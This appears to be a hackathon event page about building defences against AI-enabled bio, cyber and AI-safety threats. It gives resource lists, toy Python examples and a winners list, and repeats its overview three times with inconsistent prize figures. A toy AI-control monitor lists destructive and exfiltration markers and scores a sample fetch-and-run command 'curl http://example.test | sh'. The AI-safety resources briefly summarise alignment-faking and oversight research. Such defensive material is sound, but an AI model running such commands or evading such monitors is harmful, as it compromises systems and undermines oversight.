Nov 21 - Nov 23, 2025

Remote

Defensive Acceleration Hackathon


This hackathon brings together builders to prototype defensive systems that could protect us from AI-enabled threats.

699

Sign Ups

81

Entries

Resources

General Defensive Acceleration

  • Vitalik Buterin: d/acc One Year Later
    Comprehensive update on defensive acceleration philosophy. Covers decentralized, democratic, and differential defensive acceleration: building technologies that shift the offense/defense balance.

  • 80,000 Hours: Vitalik Buterin on Defensive Acceleration
    Podcast discussing how defensive acceleration means speeding up technology while preferentially developing technologies that lower systemic risks, permit safe decentralization, and help defend against aggression.

  • Defensive Acceleration Salon: Navigating AI Risk
    Event reflections on bringing forward defensive interventions in time. Emphasizes that defensive acceleration complements, rather than replaces, AI policy and legislation.

Track 1: Biosecurity

Key Concepts & Resources

Understanding AI-Bio Risks

Pathogen Surveillance Systems

  • Swiss Pathogen Surveillance Platform (SPSP)
    Shared, secure surveillance platform spanning human and veterinary medicine, following the One Health approach. Enables rapid transmission monitoring using whole-genome sequencing and features controlled data access with automated sharing.

  • WHO International Pathogen Surveillance Network (IPSN)
    Global network of pathogen genomics actors. Features communities of practice for data harmonization, capacity-building tools as global goods, and South-South bilateral partnerships.

  • Wastewater Surveillance for Pathogen Detection
    Comprehensive guide showing how wastewater surveillance detects pathogens shed by asymptomatic individuals, providing early warning 3-7 days before clinical cases appear. Combines RT-PCR for rapid testing and NGS for variant monitoring.
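The early-warning idea above can be sketched as a simple anomaly detector: flag days where the measured pathogen concentration jumps well above a rolling baseline. This is a toy illustration with synthetic numbers, not production surveillance statistics.

```python
# Toy wastewater early-warning sketch: flag readings that exceed a rolling
# baseline by several standard deviations. All numbers are synthetic.
from statistics import mean, stdev

def alert_days(series, window=7, z_threshold=3.0):
    """Return indices of readings more than z_threshold sigmas above baseline."""
    alerts = []
    for i in range(window, len(series)):
        baseline = series[i - window:i]
        mu, sigma = mean(baseline), stdev(baseline)
        if sigma > 0 and (series[i] - mu) / sigma > z_threshold:
            alerts.append(i)
    return alerts

# Stable background signal, then a sharp rise before clinical cases appear.
readings = [10, 11, 9, 10, 12, 10, 11, 10, 11, 40, 80]
print(alert_days(readings))  # the two spike days are flagged
```

A real system would model day-of-week effects, sampling noise, and multiple sites, but the core "baseline plus threshold" alert logic is the same shape.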

DNA Synthesis Screening

  • Gene Synthesis Screening Information Hub
    Central resource for complying with the US Framework for Nucleic Acid Synthesis Screening. Lists commercially and freely available screening tools, including Aclid, SecureDNA, and UltraSEQ.

  • The Common Mechanism
    Free, open-source, globally available tool for screening nucleic acid sequences. Helps providers efficiently screen orders against sequences of concern, such as pathogen genomes. Tested against real customer orders and exceeds Bronze Standard benchmarks.

  • NIST Inter-Tool Analysis for DNA Screening
    Study comparing six currently available sequence-screening algorithms (Aclid, Common Mechanism, FAST-NA Scanner, SeqScreen, SecureDNA, UltraSEQ) on blinded NIST datasets to assess consistency.
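To give a feel for what sequence screening does, here is a deliberately minimal sketch: flag an order if any fixed-length window matches a watchlist of sequences of concern. The watchlist entries are invented; real screeners like the Common Mechanism use curated databases, homology search, and expert review rather than exact matching.

```python
# Minimal illustration of synthesis-order screening: flag an order if any
# k-base window matches a watchlist of sequences of concern. The watchlist
# below is invented for illustration only.
CONCERN_KMERS = {"ATGCGTACGT", "GGGCCCAAAT"}  # hypothetical entries, k=10

def screen_order(sequence, k=10):
    """Return the watchlist k-mers that appear in the ordered sequence."""
    seq = sequence.upper()
    windows = {seq[i:i + k] for i in range(len(seq) - k + 1)}
    return windows & CONCERN_KMERS

print(screen_order("ttttATGCGTACGTcccc"))  # one hit -> escalate for review
print(screen_order("AAAATTTTCCCCGGGG"))    # no hits -> order can proceed
```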

Biosecurity in Practice

  • National Academies Vision for Wastewater Surveillance
    2023 report outlining a vision for a nationwide wastewater surveillance system that identifies SARS-CoV-2 variants, influenza strains, and antibiotic-resistant bacteria. The proposed system would reduce geographic inequities and pair with sentinel sites at zoos and airports.

  • NCBI Pathogen Detection System
    Centralized system integrating bacterial and fungal pathogen genomic sequences. Quickly clusters related sequences to identify transmission chains and screens for antimicrobial resistance genes.

Track 2: Cybersecurity

Key Concepts & Resources

AI-Powered Threat Detection

  • ProjectDiscovery - Nuclei Vulnerability Scanner
    Open-source framework with 11,000+ detection templates. Validates exploitability at runtime using direct behavioral checks rather than version fingerprinting, reducing false positives by 97%. Responds to critical CVEs 10x faster than legacy scanners.

  • 5 AI-Powered Cybersecurity Tools You Should Know
    Overview of MDR (Managed Detection and Response), XDR (Extended Detection and Response), SIEM (Security Information and Event Management), UEBA (User and Entity Behavior Analytics), and SOAR (Security Orchestration, Automation, and Response) platforms that use AI for 24/7 threat hunting.

  • Awesome Automated Vulnerability Detection
    Curated list of research papers, datasets, and resources on automated vulnerability detection. Maintained by the Alan Turing Institute's AI for Cyber Defence Research Center.

AI Red Teaming Tools

  • 31 Best Tools for Red Teaming (2025)
    Comprehensive comparison covering:

    • Mindgard: Continuous security testing with automated AI red teaming

    • Garak: LLM vulnerability scanner by NVIDIA for data leakage and misinformation

    • PyRIT: Microsoft's Python Risk Identification Toolkit for adversarial inputs

    • CleverHans: Python library for adversarial training examples and defenses

    • Counterfit: Microsoft CLI for ML security assessment

    • Inspect: UK AI Safety Institute tool for LLM evaluation

  • Microsoft AI Red Team Resources
    Industry-leading guidance and best practices from the Microsoft AI Red Team on safeguarding organizations' AI systems.

  • Top Open Source AI Red-Teaming Tools Comparison
    Detailed feature comparison of Promptfoo, PyRIT, Garak, and other tools, with compliance mapping to OWASP, NIST, MITRE ATLAS, and the EU AI Act.

  • Awesome AI Red Teaming
    Curated list covering prompt engineering, attacks, approaches, and events.

Vulnerability Management

Memory Safety

  • The Rust Programming Language
    Roughly 70% of vulnerabilities in C/C++ codebases are caused by memory errors. Rust provides memory safety without garbage collection, eliminating entire classes of bugs such as buffer overflows and use-after-free.

Track 3: Privacy & Trust

Key Concepts & Resources

Privacy-Preserving AI Fundamentals

  • Privacy-Preserving AI: Secure 2025 Breakthrough
    Overview of key techniques: Fully Homomorphic Encryption (FHE) for computation on encrypted data, Federated Learning for distributed training, Differential Privacy for adding controlled noise, and Secure Multi-Party Computation for collaborative analysis. Discusses the Orion framework breakthrough making FHE 100x faster.

  • Privacy-Preserving AI Techniques in Biomedicine
    Comprehensive review of cryptographic techniques (homomorphic encryption, SMPC), differential privacy, federated learning, and hybrid approaches. Covers applications in genomics, clinical data, and GWAS studies.

  • OECD Guide on Privacy Enhancing Technologies
    Official guidance on PETs that enable the collection, analysis, and sharing of information while protecting data confidentiality and privacy.
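Of the techniques above, differential privacy is the easiest to demonstrate in a few lines. The sketch below shows the classic Laplace mechanism: release a count plus noise scaled to sensitivity/epsilon, so any single person's record shifts the output distribution only slightly. The epsilon value and data are illustrative.

```python
# Sketch of the Laplace mechanism behind differential privacy: a count query
# is released with noise of scale sensitivity/epsilon added.
import math
import random

def laplace_noise(scale):
    """Draw Laplace(0, scale) noise by inverse-CDF sampling."""
    u = random.random() - 0.5
    return -scale * math.copysign(1.0, u) * math.log(1 - 2 * abs(u))

def dp_count(records, predicate, epsilon=1.0):
    """Noisy count; sensitivity is 1 because one record changes the count by at most 1."""
    true_count = sum(1 for r in records if predicate(r))
    return true_count + laplace_noise(1.0 / epsilon)

ages = [23, 35, 41, 29, 52, 60]
print(dp_count(ages, lambda a: a >= 40, epsilon=0.5))  # 3 plus noise
```

Smaller epsilon means more noise and stronger privacy; production systems (and libraries like OpenMined's) also track the cumulative privacy budget across queries.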

Federated Learning & Differential Privacy

Tools & Frameworks

  • Concrete ML by Zama
    Open-source Python library for privacy-preserving machine learning using fully homomorphic encryption. Enables training and inference on encrypted data without decryption.

  • OpenMined
    Open-source technology infrastructure helping researchers and app builders get answers from data without needing a copy or direct access. Supports federated learning, differential privacy, and encrypted computation.

  • Awesome Multi-Party Computation
    Curated list of MPC libraries, including FRESCO, Bristol SPDZ, MPZ (Rust), and others. Compares performance and practical usage.

  • Privacy Enhancing Technologies Repository
    Comprehensive collection including the UN guide on PETs for official statistics, regulatory frameworks, and implementation resources.

Real-World Examples

  • Privacy4Web3 Hackathon Winners
    Examples of privacy-preserving projects built in 3 months:

    • SQUIDL: Privacy-first payment platform with untraceable transactions

    • PrivaHealth: Healthcare data management where patients control their medical data

    • Copyright Aware AI: Protecting creator IP using confidential computing

  • Organizing a Privacy-Preserving Hackathon (Zama x HuggingFace)
    Case study of a 2-day hackathon using FHE. Winning projects included deepfake detection, model watermarking, and a medical assistant, all with encrypted data processing.

Privacy Techniques Explained

  • What Are Privacy Enhancing Technologies (PETs)?
    Detailed breakdown of anonymization, confidential computing, differential privacy, federated learning, synthetic data, and homomorphic encryption. Includes compliance benefits for GDPR, CCPA, and HIPAA.

Track 4: AI Safety

Key Concepts & Resources

Alignment & Safety Fundamentals

  • Anthropic Research
    Leading research on interpretability (understanding how LLMs work internally), alignment (ensuring AI systems remain helpful, honest, and harmless), and societal impacts. Recent work includes alignment faking, scaling monosemanticity, and constitutional AI.

  • Transformer Circuits Thread
    Anthropic's interpretability research exploring how language models work internally. Nobody fully understands how they work; this thread aims to understand the "biology" of these systems through circuit analysis.

  • OpenAI Safety & Responsibility
    Safety work including external red teaming, frontier risk evaluations under the Preparedness Framework, and model deployment decisions.

  • Alignment Faking in Large Language Models
    First empirical example of a large language model engaging in alignment faking: appearing aligned during training while pursuing different goals when deployed. Critical for understanding future AI risks.

Mechanistic Interpretability

  • Awesome Mechanistic Interpretability
    Comprehensive repository with:

    • Libraries: TransformerLens (for mechanistic analysis), Unseal, BertViz (attention visualization)

    • Tools: Lexoscope (neuron activation examples), exBert (Transformer analysis)

    • Resources: Neel Nanda's reading list, interpretability exercises

  • Understanding Mechanistic Interpretability in AI Models
    Deep dive into reverse-engineering neural networks at the algorithmic level. Explains features (fundamental units), circuits (computational subgraphs), and universality (analogous features across models). Covers techniques such as probing, activation patching, and causal tracing.

  • Zoom In: An Introduction to Circuits
    Foundational paper on understanding neural networks by analyzing tiny subgraphs (circuits) for which rigorous empirical investigation is tractable. Circuits sidestep scaling challenges by being falsifiable: if you understand a circuit, you can predict what changes when you edit its weights.

  • Prisma: Open Source Toolkit for Mechanistic Interpretability in Vision
    Framework for vision interpretability with 75+ transformers, 80+ pre-trained SAE weights, circuit analysis tools, and visualization capabilities. Reveals that vision SAEs can exhibit lower sparsity than language SAEs.

  • Interpretability Starter Resources
    Templates, tools, and introductions for mechanistic interpretability research. Includes EasyTransformer demos, activation atlases, and starter projects.

AI Safety Evaluations

  • METR Autonomy Evaluation Resources
    Task suite, software tooling, and guidelines for evaluating dangerous autonomous capabilities of frontier models. Includes:

    • Task suite with difficulty estimates based on human completion time

    • Baseline agents and a workbench for running evaluations

    • Guidelines on capability elicitation and post-training enhancements

    • Example protocol for overall evaluation (beta v0.1)

  • METR (formerly ARC Evals)
    Evaluates whether cutting-edge AI systems could pose catastrophic risks, with a focus on autonomous replication: the ability of an AI to survive on cloud servers, obtain resources, and make copies of itself. Given early access to GPT-4 and Claude for safety assessment.

  • UK AI Safety Institute - Inspect
    Red-teaming tool for evaluating LLMs. Features benchmark evaluations, scalable assessments, and integration with safety research protocols.

Scalable Oversight

  • What is Scalable Oversight?
    Methods for keeping AI systems aligned even when they surpass human expertise. Covers:

    • RLHF/RLAIF: Reinforcement learning from human/AI feedback

    • Debate: Models argue to help humans judge correctness

    • Recursive reward modeling: Breaking hard problems into easier subproblems

    • Constitutional AI: Self-improvement through principles

  • Scaling Laws for Scalable Oversight
    Research showing that nested oversight systems using multiple layers of guards (human → small AI → medium AI → large AI) can improve safety rates from under 50% to over 70% for moderate capability gaps.

  • AI Oversight Exposed: 5 Critical Scaling Laws
    As AI grows smarter, supervision gets harder: when an AI's cognitive reach extends beyond human capacity, oversight success drops. Nested scalable oversight spreads the burden across multiple agents to reduce single points of failure.
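As a toy intuition for why layering guards helps: if each layer independently catches misbehavior with probability p, then n layers catch 1 - (1 - p)^n of failures. Real guard layers are correlated, so treat this as an optimistic upper bound, not the actual model used in the research above.

```python
# Toy nested-oversight arithmetic: independent guard layers that each catch
# misbehavior with probability p give an overall catch rate of 1 - (1-p)^n.
def catch_rate(p_per_layer, n_layers):
    return 1 - (1 - p_per_layer) ** n_layers

for n in (1, 2, 3):
    print(f"{n} layer(s): {catch_rate(0.5, n):.3f}")
# One 50% guard misses half of failures; three such layers miss only 12.5%.
```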

Project Ideas (see the linked list of ideas)

Project Scoping Advice

Based on successful hackathon retrospectives:

  1. Focus on MVP, Not Production. In 2 days, aim for:

    1. Day 1: Set up environment, implement core functionality, get basic pipeline working

    2. Day 2: Add 1-2 key features, create demo, prepare presentation

  2. Use Mock/Simulated Data. Instead of integrating real APIs or databases, use:

    1. Synthetic datasets

    2. Pre-recorded samples

    3. Simulation environments
      This eliminates authentication, rate limiting, and data quality issues.

  3. Leverage Pre-trained Models. Don't train from scratch. Use:

    1. OpenAI/Anthropic APIs for LLMs

    2. Hugging Face for pre-trained models

    3. Existing detection tools as starting points

  4. Clear Success Criteria. Define what "working" means:

    1. For surveillance: Dashboard displays data + basic alert

    2. For screening: Identifies 3+ test cases correctly

    3. For red teaming: Generates 10+ attacks + evaluation report

    4. For interpretability: Visualizes one circuit + validation test
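The mock-data advice in step 2 can look like this in practice: a seeded generator that yields a small labeled dataset so your demo runs without real APIs, authentication, or rate limits. All field names and rates below are invented for illustration.

```python
# Seeded synthetic "network log" generator: a stand-in dataset for a demo.
# Fields and the attack rate are made up; the point is determinism and speed.
import random

def synthetic_logs(n=100, attack_rate=0.1, seed=42):
    rng = random.Random(seed)  # fixed seed -> reproducible demo data
    logs = []
    for _ in range(n):
        is_attack = rng.random() < attack_rate
        logs.append({
            "src_ip": f"10.0.{rng.randint(0, 255)}.{rng.randint(1, 254)}",
            "bytes": rng.randint(40, 1500) * (10 if is_attack else 1),
            "label": "attack" if is_attack else "benign",
        })
    return logs

logs = synthetic_logs()
print(len(logs), sum(1 for log in logs if log["label"] == "attack"))
```

Because the generator is seeded, every run of your demo shows the same data, which makes a live presentation far less fragile.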

Overview

DEFENSIVE ACCELERATION HACKATHON WINNERS

Huge congratulations to all our winners! With 1000+ participants across 15 local sites, the competition was fierce and the projects were outstanding. Here's who came out on top:

  • 1st Place ($3500 each):

    • Mechanistic Watchdog

    • GUARDIAN: Guarded Universal Architecture for Defensive Interpretation And traNslation

  • 2nd Place ($3000 each):

    • Comparative LLM methods for Social Media Bot Detection

    • Robust LLM Neural Activation-Mediated Alignment

  • 3rd Place ($1500 each):

    • Actions speak louder than words: Evaluating Tool Usage Risk in Open-Weight AI for Defensive Deployment

    • A Defensive AI Agent Against Large Language Model (LLM)-Assisted Polymorphic Malware

  • 4th Place ($1000 each):

    • Opening Doors to Multimodal Deception

    • Automating Privacy-Preserving Model Deployment

    • TheWizard

    • Detecting Piecewise Cyber Espionage in Model APIs

—————————————————————————————————————————————————

Defensive acceleration (def/acc) – building better defensive technology – may be one of the most important leverage points we have for managing AI risk. We believe the most powerful solution to technological risk is often more technology. 

This hackathon is sponsored by Halcyon Futures. We are bringing in 1000+ builders to prototype defensive systems that could protect us from AI-enabled biosecurity and cyber threats. You'll have one intensive weekend to build something real, to turn ideas into MVPs. 

Top teams get:

  • 💰$20,000 in total prizes

  • A fully-funded trip to London for BlueDot's December incubator week (Dec 1-5, for the most promising projects)

  • A guaranteed spot in BlueDot's AGI Strategy course

Apply if you think strengthening the shield is as important as blunting the spear!

In this hackathon, you can build:

  • Environmental pathogen surveillance system that monitors wastewater and airport screening data to detect novel threats before outbreaks spread

  • AI red-teaming tool that uses advanced models to automatically find vulnerabilities in critical infrastructure and privately disclose them to operators

  • AI control dashboard that uses trusted models to monitor potentially dangerous AI systems and flag misaligned behavior before deployment

  • Memory safety refactoring tool that helps convert C/C++ codebases to Rust, eliminating the 70% of vulnerabilities caused by memory errors

  • Any other defensive project that advances the field of AI safety!

You will work in teams over one weekend and submit open-source defensive tools, benchmark suites, scenario analyses, policy briefs, or empirical studies that strengthen our defenses against AI-enabled threats.

What is def/acc?

Def/acc is about building technology to protect us from the biggest threats we face – everything from pandemics and cybercrime to powerful AI itself. It's the idea that the most powerful solution to technological risk is often more technology. It's a way to reconcile technological optimism with taking dangerous capabilities seriously.

When we think about emerging threats from AI, we broadly have two options: "blunt the spear" or "strengthen the shield." The first means slowing down or regulating the technology; the second means building better defensive technology. This hackathon is mainly about strengthening the shield.

Of course, technology alone won't save us. But whatever you believe about the impact of policy work or governance efforts, better defensive technology is close to a free lunch. And right now, we're dramatically underinvested in it.

Why this hackathon?

The Problem

AI is fundamentally changing what's possible for both attackers and defenders. Language models can guide pathogen design. Automated tools discover software vulnerabilities faster than humans can patch them. The attack surface is expanding while our defensive infrastructure – biosurveillance systems, cybersecurity tools, coordination mechanisms – remains fragmented and slow to adapt.

We face an uncomfortable asymmetry: offensive capabilities are democratizing rapidly while defensive capabilities lag behind. A biology graduate student with access to AI and modest resources can now explore dangerous directions that previously required specialized laboratory infrastructure. Meanwhile, our biosurveillance systems still struggle to detect novel threats until after substantial community spread.

Why Defensive Acceleration Matters Now

Certain types of technology make the world better far more reliably than others. We need active human intention to choose the directions we want.

Right now, we're under-indexing on defensive technologies. The bulk of AI safety effort flows into alignment research and governance proposals. Both are valuable, but comparatively little goes into building the defensive infrastructure we need regardless of how those other challenges resolve.

That gap represents both a risk and an opportunity. Better defensive technology could:

  • Give us early warning of biological threats before they become pandemics

  • Help defenders keep pace with AI-enabled cyber attacks

  • Enable coordination at the speed modern threats require

  • Buy us time to solve harder problems like alignment

  • Create proof points that defensive tech can scale and succeed

Hackathon Tracks

1. Biosecurity Defenses:

  • Environmental pathogen surveillance and early warning systems (wastewater + airport + clinical data)

  • DNA synthesis screening tools

  • Rapid response coordination platforms

  • Automated threat assessment for novel pathogens

2. Cybersecurity & Infrastructure Protection:

  • Defensive AI for detecting novel attack patterns

  • AI-powered red-teaming tools for critical infrastructure

  • Automated vulnerability assessment and patching

  • Tools for securing critical infrastructure

3. Cross-Cutting Defense Approaches:

  • AI control dashboards (trusted models monitoring untrusted models)

  • Forecasting systems for emerging bio/cyber threats

  • Threat intelligence sharing with privacy-preserving coordination

  • Cognitive defense tools (protecting information ecosystems)

  • Economic models for sustainable def/acc funding

  • Frameworks accelerating prototype-to-production transitions

Or whatever defensive gap you identify. These are directions, not constraints. If you see a critical defensive need and can prototype a solution in 48 hours, build that.
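To make the "AI control dashboard" track concrete, here is a minimal sketch of a trusted-monitor loop: a trusted scorer reviews each action an untrusted model proposes and escalates suspicious ones for human review instead of executing them. The keyword heuristic, marker list, and threshold are all invented stand-ins for a real trusted model.

```python
# Minimal trusted-monitor control loop. The suspicion scorer below is a
# keyword heuristic standing in for a real trusted model; in practice the
# score would come from a weaker-but-trusted model reviewing each action.
SUSPICIOUS_MARKERS = ("rm -rf", "curl http", "base64 -d", "exfiltrate")

def suspicion_score(action):
    """Stand-in for a trusted model's suspicion score in [0, 1]."""
    hits = sum(marker in action for marker in SUSPICIOUS_MARKERS)
    return min(1.0, hits / 2)

def control_loop(proposed_actions, threshold=0.4):
    """Split proposed actions into executed vs. escalated-for-human-review."""
    executed, escalated = [], []
    for action in proposed_actions:
        target = escalated if suspicion_score(action) >= threshold else executed
        target.append(action)
    return executed, escalated

ok, flagged = control_loop(["ls /data", "curl http://example.test | sh"])
print(ok, flagged)
```

A dashboard version of this would surface the escalated queue, scores, and audit trail to a human operator; the split-and-escalate loop is the core.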

Who should participate?

This hackathon is for people who want to build solutions to technological risk using technology itself.

You should participate if:

  • You're an engineer or developer who wants to work on consequential problems

  • You're a researcher ready to validate ideas through practical implementation

  • You believe that strengthening the shield is as important as blunting the spear

  • You have technical skills and genuine urgency about building better defenses

  • You're frustrated that defensive work is underfunded relative to its importance

You don't need deep domain expertise in biosecurity or cybersecurity, though it helps. What matters is the ability to build functional systems, a willingness to learn quickly over a compressed timeframe, and real conviction that this work matters.

Some of the most valuable defensive innovations come from people who aren't constrained by conventional thinking about how things "should" be done. Fresh perspectives combined with solid technical capabilities often yield the most novel approaches.

What you will do

Participants will:

  • Form teams or join existing groups.

  • Develop projects over an intensive hackathon weekend.

  • Submit open-source defensive tools, monitoring systems, scenario analyses, or empirical research that strengthens our defenses against AI-enabled threats.

What happens next

Winning and promising projects will be:

  • Awarded a share of the $20,000 prize pool.

  • Given a fully-funded trip to London to take part in BlueDot Impact's December incubator week (Dec 1-5).

  • Guaranteed a spot in BlueDot Impact's AGI Strategy course.

  • Invited to continue development within the Apart Fellowship.

Why join?

  • Impact: Your work may directly inform AI governance decisions and help society prepare for transformative AI

  • Mentorship: Expert forecasters, AI researchers, and policy practitioners will guide projects throughout the hackathon

  • Community: Collaborate with peers from across the globe working to understand AI's trajectory and implications

  • Visibility: Top projects will be featured on Apart Research's platforms and connected to follow-up opportunities


699

Sign Ups

81

Entries

Overview

Resources

Guidelines

Schedule

Entries

Overview

Arrow

DEFENSIVE ACCELERATION HACKATHON WINNERS

Huge congratulations to all our winners! With 1000+ participants across 15 local sites, the competition was fierce and the projects were outstanding. Here's who came out on top:

  • 1st Place ($3500 each):

    • Mechanistic Watchdog

    • GUARDIAN: Guarded Universal Architecture for Defensive Interpretation And traNslation

  • 2nd Place ($3000 each):

    • Comparative LLM methods for Social Media Bot Detection

    • Robust LLM Neural Activation-Mediated Alignment

  • 3rd Place ($1500 each):

    • Actions speak louder than words: Evaluating Tool Usage Risk in Open-Weight AI for Defensive Deployment

    • A Defensive AI Agent Against Large Language Model (LLM)-Assisted Polymorphic Malware

  • 4th Place ($1000 each):

    • Opening Doors to Multimodal Deception

    • Automating Privacy-Preserving Model Deployment -TheWizard -Detecting Piecewise Cyber Espionage in Model APIs

—————————————————————————————————————————————————

Defensive acceleration (def/acc) – building better defensive technology – may be one of the most important leverage points we have for managing AI risk. We believe the most powerful solution to technological risk is often more technology. 

This hackathon is sponsored by Halcyon Futures. We are bringing in 1000+ builders to prototype defensive systems that could protect us from AI-enabled biosecurity and cyber threats. You'll have one intensive weekend to build something real, to turn ideas into MVPs. 

Top teams get:

  • 💰$20,000 in total prizes

  • A fully-funded trip to London for BlueDot's December incubator week (Dec 1-5, for the most promising projects)

  • A guaranteed spot in BlueDot's AGI Strategy course

Apply if you think strengthening the shield is as important as blunting the spear!

In this hackathon, you can build:

  • Environmental pathogen surveillance system that monitors wastewater and airport screening data to detect novel threats before outbreaks spread

  • AI red-teaming tool that uses advanced models to automatically find vulnerabilities in critical infrastructure and privately disclose them to operators

  • AI control dashboard that uses trusted models to monitor potentially dangerous AI systems and flag misaligned behavior before deployment

  • Memory safety refactoring tool that helps convert C/C++ codebases to Rust, eliminating the 70% of vulnerabilities caused by memory errors

  • Pursue other defensive projects that advance the field of AI safety!

You will work in teams over one weekend and submit open-source forecasting models, benchmark suites, scenario analyses, policy briefs, or empirical studies that advance our understanding of AI development timelines and trajectories.

What is def/acc?

Def/acc is about building technology to protect us from the biggest threats we face – everything from pandemics and cybercrime to powerful AI itself. It's the idea that the most powerful solution to technological risk is often more technology. It's a way to reconcile technological optimism with taking dangerous capabilities seriously.

When we think about emerging threats from AI, we broadly have two options: "blunt the spear" or "strengthen the shield." The first means slowing down or regulating the technology; the second means building better defensive technology. This hackathon is mainly about strengthening the shield.

Of course, technology alone won't save us. But whatever you believe about the impact of policy work or governance efforts, better defensive technology is close to a free lunch. And right now, we're dramatically underinvested in it.

Why this hackathon?

The Problem

AI is fundamentally changing what's possible for both attackers and defenders. Language models can guide pathogen design. Automated tools discover software vulnerabilities faster than humans can patch them. The attack surface is expanding while our defensive infrastructure – biosurveillance systems, cybersecurity tools, coordination mechanisms – remains fragmented and slow to adapt.

We face an uncomfortable asymmetry: offensive capabilities are democratizing rapidly while defensive capabilities lag behind. A biology graduate student with access to AI and modest resources can now explore dangerous directions that previously required specialized laboratory infrastructure. Meanwhile, our biosurveillance systems still struggle to detect novel threats until after substantial community spread.

Why Defensive Acceleration Matters Now

There are certain types of technology that much more reliably make the world better than other types of technology. We need active human intention to choose the directions that we want.

Right now, we're under-indexing on defensive technologies. The bulk of AI safety effort flows into alignment research and governance proposals, both valuable, but comparatively little goes into building the defensive infrastructure we need regardless of how those other challenges resolve.

That gap represents both a risk and an opportunity. Better defensive technology could:

  • Give us early warning of biological threats before they become pandemics

  • Help defenders keep pace with AI-enabled cyber attacks

  • Enable coordination at the speed modern threats require

  • Buy us time to solve harder problems like alignment

  • Create proof points that defensive tech can scale and succeed

Hackathon Tracks

1. Biosecurity Defenses:

  • Environmental pathogen surveillance and early warning systems (wastewater + airport + clinical data)

  • DNA synthesis screening tools

  • Rapid response coordination platforms

  • Automated threat assessment for novel pathogens

2. Cybersecurity & Infrastructure Protection:

  • Defensive AI for detecting novel attack patterns

  • AI-powered red-teaming tools for critical infrastructure

  • Automated vulnerability assessment and patching

  • Tools for securing critical infrastructure

3. Cross-Cutting Defense Approaches:

  • AI control dashboards (trusted models monitoring untrusted models)

  • Forecasting systems for emerging bio/cyber threats

  • Threat intelligence sharing with privacy-preserving coordination

  • Cognitive defense tools (protecting information ecosystems)

  • Economic models for sustainable def/acc funding

  • Frameworks accelerating prototype-to-production transitions

Or whatever defensive gap you identify. These are directions, not constraints. If you see a critical defensive need and can prototype a solution in 48 hours, build that.

Who should participate?

This hackathon is for people who want to build solutions to technological risk using technology itself.

You should participate if:

  • You're an engineer or developer who wants to work on consequential problems

  • You're a researcher ready to validate ideas through practical implementation

  • You believe that strengthening the shield is as important as blunting the spear

  • You have technical skills and genuine urgency about building better defenses

  • You're frustrated that defensive work is underfunded relative to its importance

You don't need deep domain expertise in biosecurity or cybersecurity, though it helps. What matters: ability to build functional systems, willingness to learn quickly over a compressed timeframe, and real conviction that this work matters.

Some of the most valuable defensive innovations come from people who aren't constrained by conventional thinking about how things "should" be done. Fresh perspectives combined with solid technical capabilities often yield the most novel approaches.

What you will do

Participants will:

  • Form teams or join existing groups.

  • Develop projects over an intensive hackathon weekend.

  • Submit open-source forecasting models, scenario analyses, monitoring tools, or empirical research advancing our understanding of AI trajectories

What happens next

Winning and promising projects will be:

  • Awarded with $10,000 worth of prizes in cash.

  • Awarded a fully-funded trip to London to take part in BlueDot Impact's December Incubator Accelerator week (Dec 1-5)

  • Guaranteed spot in BlueDot Impact AGI Strategy course.

  • Invited to continue development within the Apart Fellowship.

Why join?

  • Impact: Your work may directly inform AI governance decisions and help society prepare for transformative AI

  • Mentorship: Expert forecasters, AI researchers, and policy practitioners will guide projects throughout the hackathon

  • Community: Collaborate with peers from across the globe working to understand AI's trajectory and implications

  • Visibility: Top projects will be featured on Apart Research's platforms and connected to follow-up opportunities


699

Sign Ups

81

Entries

Overview

Resources

Guidelines

Schedule

Entries

Overview

Arrow

DEFENSIVE ACCELERATION HACKATHON WINNERS

Huge congratulations to all our winners! With 1000+ participants across 15 local sites, the competition was fierce and the projects were outstanding. Here's who came out on top:

  • 1st Place ($3500 each):

    • Mechanistic Watchdog

    • GUARDIAN: Guarded Universal Architecture for Defensive Interpretation And traNslation

  • 2nd Place ($3000 each):

    • Comparative LLM methods for Social Media Bot Detection

    • Robust LLM Neural Activation-Mediated Alignment

  • 3rd Place ($1500 each):

    • Actions speak louder than words: Evaluating Tool Usage Risk in Open-Weight AI for Defensive Deployment

    • A Defensive AI Agent Against Large Language Model (LLM)-Assisted Polymorphic Malware

  • 4th Place ($1000 each):

    • Opening Doors to Multimodal Deception

    • Automating Privacy-Preserving Model Deployment

    • TheWizard: Detecting Piecewise Cyber Espionage in Model APIs

—————————————————————————————————————————————————

Defensive acceleration (def/acc) – building better defensive technology – may be one of the most important leverage points we have for managing AI risk. We believe the most powerful solution to technological risk is often more technology. 

This hackathon is sponsored by Halcyon Futures. We are bringing in 1000+ builders to prototype defensive systems that could protect us from AI-enabled biosecurity and cyber threats. You'll have one intensive weekend to build something real, to turn ideas into MVPs. 

Top teams get:

  • 💰$20,000 in total prizes

  • A fully-funded trip to London for BlueDot's December incubator week (Dec 1-5, for the most promising projects)

  • A guaranteed spot in BlueDot's AGI Strategy course

Apply if you think strengthening the shield is as important as blunting the spear!

In this hackathon, you can build:

  • Environmental pathogen surveillance system that monitors wastewater and airport screening data to detect novel threats before outbreaks spread

  • AI red-teaming tool that uses advanced models to automatically find vulnerabilities in critical infrastructure and privately disclose them to operators

  • AI control dashboard that uses trusted models to monitor potentially dangerous AI systems and flag misaligned behavior before deployment

  • Memory safety refactoring tool that helps convert C/C++ codebases to Rust, addressing the roughly 70% of severe vulnerabilities attributed to memory-safety errors

  • Any other defensive project that advances the field of AI safety!
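
To give a flavor of the first idea, here is a minimal sketch of one ingredient of a wastewater early-warning system: flagging a daily pathogen-concentration reading that spikes above a rolling baseline. The 14-day window, 3-sigma threshold, and all readings are illustrative assumptions, not a production design.

```python
from collections import deque
from statistics import mean, stdev

def make_spike_detector(window: int = 14, threshold: float = 3.0):
    """Return a detector that flags a daily reading exceeding `threshold`
    standard deviations above the rolling baseline of the previous
    `window` days."""
    history = deque(maxlen=window)

    def observe(reading: float) -> bool:
        # Need a full baseline window before anything can be flagged.
        if len(history) < window:
            history.append(reading)
            return False
        baseline_mean = mean(history)
        baseline_sd = stdev(history) or 1e-9  # guard against zero variance
        is_spike = reading > baseline_mean + threshold * baseline_sd
        history.append(reading)
        return is_spike

    return observe

# 14 days of stable background signal, then a sharp rise on day 15.
detect = make_spike_detector()
readings = [100, 102, 98, 101, 99, 103, 97, 100, 102, 99, 101, 98, 100, 102, 400]
flags = [detect(r) for r in readings]
```

A real system would of course fuse multiple catchment sites, model weekly seasonality, and correct for flow rate; the point is that even the simplest baseline-deviation check turns raw concentration data into an actionable alert.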

You will work in teams over one weekend and submit open-source defensive tools, benchmark suites, scenario analyses, policy briefs, or empirical studies that strengthen our defenses against AI-enabled threats.

